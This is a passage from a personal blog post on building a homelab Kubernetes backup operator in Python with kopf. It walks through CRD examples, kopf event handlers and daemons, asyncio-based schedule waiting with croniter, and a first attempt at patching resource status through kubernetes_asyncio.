</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">state</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">integer</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;State of the last backup. 1: Failed, 0: Successful&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">timestamp</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Date and time the last backup run was executed&#34;</span>
</span></span></code></pre></div><p>This CRD describes the backups to be done for an individual service. It contains
two main parts, the status and the spec. In the spec, I&rsquo;m configuring the
S3 bucket to be used for the backup, and a list of things to back up. Right now,
I&rsquo;ve only got PersistentVolumeClaims and S3 buckets in mind. An instantiation
might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-service-backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backup-tests</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucketName</span>: <span style="color:#e6db74">&#34;non-existant-bucket&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">non-existant-pvc</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">another-non-existant-pvc</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">non-existant-S3-bucket</span>
</span></span></code></pre></div><h2 id="kopf-overview">Kopf overview</h2>
<p>Kopf has a relatively nice approach to listening for changes to the resources it is
supposed to watch. It makes use of Kubernetes&rsquo; watch API and combines the raw
Kubernetes events into a nicer interface than plain events alone would
provide.</p>
<p>The main mechanism is event handlers for a small group of events. These handlers
can be defined for each of four different event categories, which map to decorators
as sketched after the list:</p>
<ol>
<li>Creation of a new resource</li>
<li>Resume of the handler for an already existing resource after an operator
restart</li>
<li>Deletion of a resource</li>
<li>Change of a resource</li>
</ol>
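<p>In decorator form, those four categories map to kopf like this, shown here with my
HomelabServiceBackup CRD as a quick sketch:</p>
<pre tabindex="0"><code>import kopf


@kopf.on.create('homelabservicebackups')    # 1. a new resource was created
async def created(spec, **_): ...


@kopf.on.resume('homelabservicebackups')    # 2. resource already existed when the operator started
async def resumed(spec, **_): ...


@kopf.on.delete('homelabservicebackups')    # 3. the resource was deleted
async def deleted(spec, **_): ...


@kopf.on.update('homelabservicebackups')    # 4. the resource changed
async def updated(old, new, diff, **_): ...
</code></pre>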
<p>In addition, there are daemons, which are long running handlers. Instead of
running to completion for every event, they stay active from the moment a
resource is created to the moment it is deleted. They are automatically started
up after operator restarts as well.</p>
<p>Finally, there is a generic event handler, which gets the full firehose of
Kubernetes events, without the nicely prepared diffs and the like you get
from kopf&rsquo;s event category handlers.</p>
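<p>For completeness, such a raw event handler would look roughly like this; I&rsquo;m not using
one in the operator:</p>
<pre tabindex="0"><code>import kopf


@kopf.on.event('homelabservicebackups')
async def raw_events(event, **_):
    # event is the raw watch event, e.g. {'type': 'MODIFIED', 'object': {...}}
    print(event['type'], event['object']['metadata']['name'])
</code></pre>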
<p>The handlers are Python functions with a decorator which describes the
event category they should listen on and the CRD they should listen for. Those
decorators can also be combined, so you can have the same Python function
handling both the creation of a new resource and the resume after an operator restart.</p>
<p>Handlers generally come in two flavors, using threads or using coroutines.
I spontaneously decided to go with the coroutine approach, because I had never
used Python&rsquo;s <a href="https://docs.python.org/3/library/asyncio.html">asyncio</a>
feature before, although I was already familiar with coroutines from C and C++.</p>
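<p>The difference is mostly in how the handler function is defined: plain functions are run by
kopf in a thread pool, while <code>async def</code> handlers run on its event loop. A small
sketch of the two flavors:</p>
<pre tabindex="0"><code>import kopf


@kopf.on.create('homelabservicebackups')
def threaded_handler(spec, **_):
    # plain function: executed in a thread pool, may block
    ...


@kopf.on.create('homelabservicebackups')
async def coroutine_handler(spec, **_):
    # coroutine: runs on the asyncio event loop, must not block
    ...
</code></pre>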
<h2 id="handling-the-homelabbackupconfig-crd">Handling the HomelabBackupConfig CRD</h2>
<p>There isn&rsquo;t too much to do in the generic handling for this CRD. There is
only ever supposed to be one instance of it, and the only thing which needs to be done
with it is to store it in memory in the operator and make it available to the
handlers of the HomelabServiceBackup CRD, so they can use the config to launch
their Jobs.</p>
<p>The implementation of the handlers themselves I kept pretty simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> kopf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> hl_backup_operator.homelab_backup_config <span style="color:#66d9ef">as</span> backupconf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.startup</span>()
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_backup_config_cond</span>(memo, <span style="color:#f92672">**</span>_):
</span></span><span style="display:flex;"><span>    memo<span style="color:#f92672">.</span>backup_conf_cond <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>Condition()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.create</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.resume</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.update</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_resume_update_handler</span>(spec, meta, memo, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">await</span> backupconf<span style="color:#f92672">.</span>handle_creation_and_change(meta[<span style="color:#e6db74">&#34;name&#34;</span>],
</span></span><span style="display:flex;"><span>                                                memo<span style="color:#f92672">.</span>backup_conf_cond, spec)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.delete</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">delete_handler</span>(meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    backupconf<span style="color:#f92672">.</span>handle_deletion(meta[<span style="color:#e6db74">&#34;name&#34;</span>])
</span></span></code></pre></div><p>This sets up a combined handler for creation, resumption and updates of the
CRD. It also creates a <a href="https://docs.python.org/3/library/asyncio-sync.html#condition">Condition</a>
which I will later use in the HomelabServiceBackup handlers to notify them
when the config changes.</p>
<p>The <code>homelab_backup_config</code> module looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> datetime
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> logging
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> croniter
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>__CONFIG <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">handle_creation_and_change</span>(name, cond, spec):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">global</span> __CONFIG
</span></span><span style="display:flex;"><span>    __CONFIG <span style="color:#f92672">=</span> spec
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Set backup config from </span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> to: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>        cond<span style="color:#f92672">.</span>notify_all()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">handle_deletion</span>(name):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">global</span> __CONFIG
</span></span><span style="display:flex;"><span>    __CONFIG <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>warning(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Config </span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> deleted. No backups will be scheduled!&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_config</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> __CONFIG
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_next_service_time</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> __CONFIG:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Service schedule time requested, but no config present.&#34;</span>
</span></span><span style="display:flex;"><span>                      )
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#e6db74">&#34;serviceBackup&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> __CONFIG
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;schedule&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> __CONFIG[<span style="color:#e6db74">&#34;serviceBackup&#34;</span>]):
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Config serviceBackup.schedule is missing.&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    now <span style="color:#f92672">=</span> datetime<span style="color:#f92672">.</span>datetime<span style="color:#f92672">.</span>now(datetime<span style="color:#f92672">.</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> croniter<span style="color:#f92672">.</span>croniter(__CONFIG[<span style="color:#e6db74">&#34;serviceBackup&#34;</span>][<span style="color:#e6db74">&#34;schedule&#34;</span>], now
</span></span><span style="display:flex;"><span>    )<span style="color:#f92672">.</span>get_next(datetime<span style="color:#f92672">.</span>datetime)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_service_backup_spec</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> __CONFIG <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;serviceBackup&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> __CONFIG:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Config serviceBackup is missing.&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> __CONFIG[<span style="color:#e6db74">&#34;serviceBackup&#34;</span>]
</span></span></code></pre></div><p>As I said, I kept it <em>really</em> simple.
This implementation stores the spec as received from the handler in a module-level
variable <code>__CONFIG</code> and then has a couple of functions to make it available
to the rest of the operator.
The only really interesting part is the <code>get_next_service_time</code> function. It
looks at the <code>spec.serviceBackup.schedule</code> value, which is a string in cron
format, for example like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 18 * * *&#34;</span>
</span></span></code></pre></div><p>I decided to keep all times in UTC internally, just to prevent confusing myself.
Instead of writing my own cron parser, I used <a href="https://github.com/kiorky/croniter">croniter</a>.
It doesn&rsquo;t just parse the cron format, but also provides a helper
to get the date and time of the next scheduled execution, which I make use of
here.</p>
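<p>Outside of the operator, the croniter usage boils down to this:</p>
<pre tabindex="0"><code>import datetime

import croniter

now = datetime.datetime.now(datetime.timezone.utc)
nxt = croniter.croniter("30 18 * * *", now).get_next(datetime.datetime)
print(nxt)  # e.g. 2024-05-25 18:30:00+00:00
</code></pre>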
<h2 id="implementing-the-homelabservicebackup-handling">Implementing the HomelabServiceBackup handling</h2>
<p>The HomelabServiceBackup resource describes the backup for an individual
service. In the operator, it will ultimately need to launch a Job to run the
backup of the configured PersistentVolumeClaims and S3 buckets belonging to the
service.</p>
<p>The first thing I implemented was waiting for the scheduled execution time
of the backup. For this, I initially thought to use kopf&rsquo;s <a href="https://kopf.readthedocs.io/en/stable/timers/">timers</a>,
but quickly realized that those only allow for a fixed interval. I needed an
adaptable wait, depending on the schedule configured in the HomelabBackupConfig.
For that reason, I reached for kopf&rsquo;s <a href="https://kopf.readthedocs.io/en/stable/daemons/">Daemons</a>.
These are long-running handlers. One is created for each instance of the watched
resource.</p>
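<p>For comparison, a kopf timer would have looked roughly like this, firing on a fixed interval
with no way to aim for a specific point in time:</p>
<pre tabindex="0"><code>import kopf


@kopf.timer('homelabservicebackups', interval=3600.0)
async def hourly_check(spec, **_):
    # runs every hour, regardless of what the HomelabBackupConfig schedule says
    ...
</code></pre>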
<p>The handler function itself is again simple, as I just call a separate function
in a module:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> kopf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> hl_backup_operator.homelab_service_backup <span style="color:#66d9ef">as</span> servicebackup
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.startup</span>()
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_backup_config_cond</span>(memo, <span style="color:#f92672">**</span>_):
</span></span><span style="display:flex;"><span>    memo<span style="color:#f92672">.</span>backup_conf_cond <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>Condition()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.daemon</span>(<span style="color:#e6db74">&#34;homelabservicebackups&#34;</span>, initial_delay<span style="color:#f92672">=</span><span style="color:#ae81ff">30</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">service_backup_daemon</span>(name, namespace, spec, memo, stopped, <span style="color:#f92672">**</span>_):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">await</span> servicebackup<span style="color:#f92672">.</span>homelab_service_daemon(name, namespace, spec, memo,
</span></span><span style="display:flex;"><span>                                               stopped)
</span></span></code></pre></div><p>The daemon will spend most of its time waiting, as it only needs to do something
in two cases:</p>
<ol>
<li>When the scheduled time for a backup has arrived</li>
<li>When the backup schedule changes</li>
</ol>
<p>Let&rsquo;s look at the second case first. This is the reason for using the
memo. The <a href="https://kopf.readthedocs.io/en/stable/memos/">memo</a> is a generic
container handled by kopf and made available to all handlers. I&rsquo;m creating a
Condition during operator startup. Every daemon will wait on this condition,
and the handler for HomelabBackupConfig updates will notify all waiters on
that condition when the HomelabBackupConfig changes. This is necessary because
the schedule is configured in the HomelabBackupConfig, so daemons might need to
adjust their wait timer.</p>
<p>Here is what that waiting currently looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">WakeupReason</span>(Enum):
</span></span><span style="display:flex;"><span>    TIMER <span style="color:#f92672">=</span> auto()
</span></span><span style="display:flex;"><span>    SCHEDULE_UPDATE <span style="color:#f92672">=</span> auto()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">cond_waiter</span>(cond):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> cond<span style="color:#f92672">.</span>wait()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">wait_for</span>(waittime, update_condition):
</span></span><span style="display:flex;"><span>    cond_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(cond_waiter(update_condition),
</span></span><span style="display:flex;"><span>                                    name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;condwait&#34;</span>)
</span></span><span style="display:flex;"><span>    sleep_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(asyncio<span style="color:#f92672">.</span>sleep(waittime), name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;sleepwait&#34;</span>)
</span></span><span style="display:flex;"><span>    done, pending <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> asyncio<span style="color:#f92672">.</span>wait([cond_task, sleep_task],
</span></span><span style="display:flex;"><span>                                       return_when<span style="color:#f92672">=</span>asyncio<span style="color:#f92672">.</span>FIRST_COMPLETED)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> p <span style="color:#f92672">in</span> pending:
</span></span><span style="display:flex;"><span>        p<span style="color:#f92672">.</span>cancel()
</span></span><span style="display:flex;"><span>    wake_reasons <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> d <span style="color:#f92672">in</span> done:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;condwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>SCHEDULE_UPDATE)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;sleepwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>TIMER)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> wake_reasons
</span></span></code></pre></div><p>As I&rsquo;ve noted before, I&rsquo;m using Python&rsquo;s asyncio module, so instead of threads,
I&rsquo;m using coroutines. Luckily, the Python standard library already provides the
means to wait for multiple tasks and even tell me which task is done waiting
when the function returns. So here, I&rsquo;m creating two tasks. One is waiting on
the given <code>waittime</code>. This is the difference between the current time and the
next scheduled backup, in seconds. The second one is waiting on the condition
I mentioned previously. This condition will be notified by the handler for the
HomelabBackupConfig when that resource changes. This is necessary because the
daemon might need to adjust its wait time if the schedule for backups has changed.</p>
<p>Finally, I&rsquo;m checking which task finished waiting, and return a list of
enums to tell the caller why it woke up, to take different actions.</p>
<p>Then there&rsquo;s the main loop of the daemon:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">homelab_service_daemon</span>(name, namespace, spec, memo, stopped):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Launching daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> <span style="color:#f92672">not</span> stopped:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>debug(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;In main loop of </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        next_run <span style="color:#f92672">=</span> backupconfig<span style="color:#f92672">.</span>get_next_service_time()
</span></span><span style="display:flex;"><span>        wait_time <span style="color:#f92672">=</span> next_run <span style="color:#f92672">-</span> datetime<span style="color:#f92672">.</span>datetime<span style="color:#f92672">.</span>now(datetime<span style="color:#f92672">.</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> wait_for(wait_time<span style="color:#f92672">.</span>total_seconds(), memo<span style="color:#f92672">.</span>backup_conf_cond)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Finished daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span></code></pre></div><p>This doesn&rsquo;t do much at the moment, as I haven&rsquo;t implemented the backups
themselves yet. It runs in an endless loop, checking the <code>stopped</code> variable,
which will be set to <code>True</code> by kopf if the HomelabServiceBackup this daemon is
handling is deleted or the operator is stopped. Kopf will also throw a
<a href="https://docs.python.org/3/library/asyncio-exceptions.html#asyncio.CancelledError">CancelledError</a>
into the coroutine in those cases, so the daemon will also be stopped even while it
is waiting.</p>
<p>The waiting time is computed with the <code>get_next_service_time</code> function I discussed
above.</p>
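<p>Eventually, the loop will also have to distinguish the two wake-up reasons returned by
<code>wait_for</code>. Roughly, the plan looks like this; <code>launch_backup_job</code> is a
hypothetical helper which doesn&rsquo;t exist yet:</p>
<pre tabindex="0"><code># sketch of where homelab_service_daemon is headed, in the same module as above
async def homelab_service_daemon_planned(name, namespace, spec, memo, stopped):
    while not stopped:
        next_run = backupconfig.get_next_service_time()
        wait_time = next_run - datetime.datetime.now(datetime.timezone.utc)
        reasons = await wait_for(wait_time.total_seconds(), memo.backup_conf_cond)
        if WakeupReason.SCHEDULE_UPDATE in reasons:
            # schedule changed: recompute the wait time on the next iteration
            continue
        if WakeupReason.TIMER in reasons:
            # scheduled time arrived: launch the backup Job for this service
            await launch_backup_job(namespace, name, spec)  # hypothetical, not written yet
</code></pre>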
<h2 id="implementing-status-updates">Implementing status updates</h2>
<p>The goal which triggered this blog post was finally getting the scheduled
triggering and the updates of the HomelabServiceBackup&rsquo;s status implemented, which
was my first change to the cluster&rsquo;s state via the operator.</p>
<p>My goal was to have each daemon update a field in its HomelabServiceBackup
resource with the scheduled time of the next backup, which would ultimately
look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">status</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nextBackup</span>: <span style="color:#e6db74">&#34;2024-05-25T18:30:00+00:00&#34;</span>
</span></span></code></pre></div><p>The <code>status.nextBackup</code> field is what I was interested in setting. I first
looked at the <a href="https://github.com/kubernetes-client/python">Kubernetes Python Client</a>,
but found that it did not support asyncio. But I quickly found
<a href="https://github.com/tomplus/kubernetes_asyncio">kubernetes_asyncio</a>.
An interesting thing I learned while looking at these two libraries is that they
were, for the most part, not hand-written. Instead, they use the <a href="https://github.com/openapitools/openapi-generator">openapi-generator</a>
to automatically generate the API code from the Kubernetes API definition. Which
is pretty cool to see, to be honest. It leads to boatloads of repeated code, but
the alternative of writing all that code by hand probably doesn&rsquo;t bear thinking
about.</p>
<p>Of course, one of the downsides of using the Python API client was that it would
not have API support for the CRDs I&rsquo;ve written for my own cluster. Instead,
I needed to use the generic <a href="https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CustomObjectsApi.md">CustomObjectsAPI</a>.</p>
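<p>As a standalone sketch, reading one of my HomelabServiceBackup resources through that
generic API looks like this:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client, config
from kubernetes_asyncio.client.api_client import ApiClient


async def get_service_backup(namespace, name):
    await config.load_kube_config()
    async with ApiClient() as api:
        custom = client.CustomObjectsApi(api)
        # group, version, namespace, plural, name
        return await custom.get_namespaced_custom_object(
            "mei-home.net", "v1alpha1", namespace, "homelabservicebackups", name)
</code></pre>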
<p>Initially, because I wanted to specifically update the status of my resources,
I looked at the <a href="https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CustomObjectsApi.md#patch_namespaced_custom_object_status">patch_namespaced_custom_object_status</a>
API. But running that API against a resource which did not have the status set
yet just returns a 404. It took me a <em>long while</em> to realize that the 404 was
not due to an error on my end, but simply because the resource needed to have
a status already for the status API to work.</p>
<p>So instead, I reached for the <a href="https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CustomObjectsApi.md#patch_namespaced_custom_object">patch_namespaced_custom_object</a>
API. That, too, had a lot of issues. I initially thought I was the first person
to use the Python API package for accessing custom objects.
All the examples I could find stated that this should work:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> kubernetes_asyncio <span style="color:#f92672">import</span> client, config
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> kubernetes_asyncio.client.api_client <span style="color:#f92672">import</span> ApiClient
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pprint <span style="color:#f92672">import</span> pprint
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> json
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">await</span> config<span style="color:#f92672">.</span>load_kube_config()
</span></span><span style="display:flex;"><span>
